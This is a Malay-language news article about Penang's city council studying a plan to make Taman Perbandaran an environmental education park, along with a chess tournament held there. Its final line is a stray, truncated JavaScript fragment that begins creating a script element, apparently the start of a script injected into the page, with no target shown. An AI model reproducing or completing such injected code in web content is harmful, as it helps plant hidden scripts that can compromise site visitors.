Taman Perbandaran sebagai taman pendidikan negeri

GEORGE TOWN – Majlis Bandaraya Pulau Pinang (MBPP) kini menjalankan kajian dalam usaha menjadikan Taman Perbandaran sebagai taman pendidikan negeri ini.

Pengarah Khidmat Pengurusan MBPP, Mohamed Akbar Mustapha berkata, fokus taman pendidikan adalah lebih kepada alam sekitar iaitu pengenalan nama-nama pokok dan alam semulajadi di sini.

“Malah, selaras itu, MBPP juga akan berusaha memperkenalkan lebih banyak ‘produk’ serta aktiviti riadah di Taman Perbandaran.

“Umumnya, taman ini wujud sejak 1970-an dan ia telah berkembang dari aspek pertambahan kepelbagaian fasiliti serta aktiviti riadah seperti kolam renang kanak-kanak dan keluarga, alat mainan kanak-kanak dan dewasa, aktiviti mendaki, senaman tai-chi yang diadakan di sini setiap hari kini,’’ katanya ketika ditemui pada Kejohanan Catur Dalam Taman di sini baru-baru ini.

Hadir sama, Presiden Persatuan Catur Pulau Pinang, Lee Ewe Ghee.

Kira-kira 150 peserta mengambil bahagian dalam acara dianjurkan MBPP dengan kerjasama Persatuan Catur Pulau Pinang (PCA).

Malah, ia turut berjaya menarik penyertaan pencatur cilik semuda lapan tahun.

Sebanyak empat kategori dipertandingkan iaitu Kategori Lapan Tahun dan Ke Bawah; Kategori 10 Tahun dan Ke Bawah; Kategori 12 Tahun dan Ke Bawah dan Kategori Terbuka.

var d=document;var s=d.createElement(‘script’);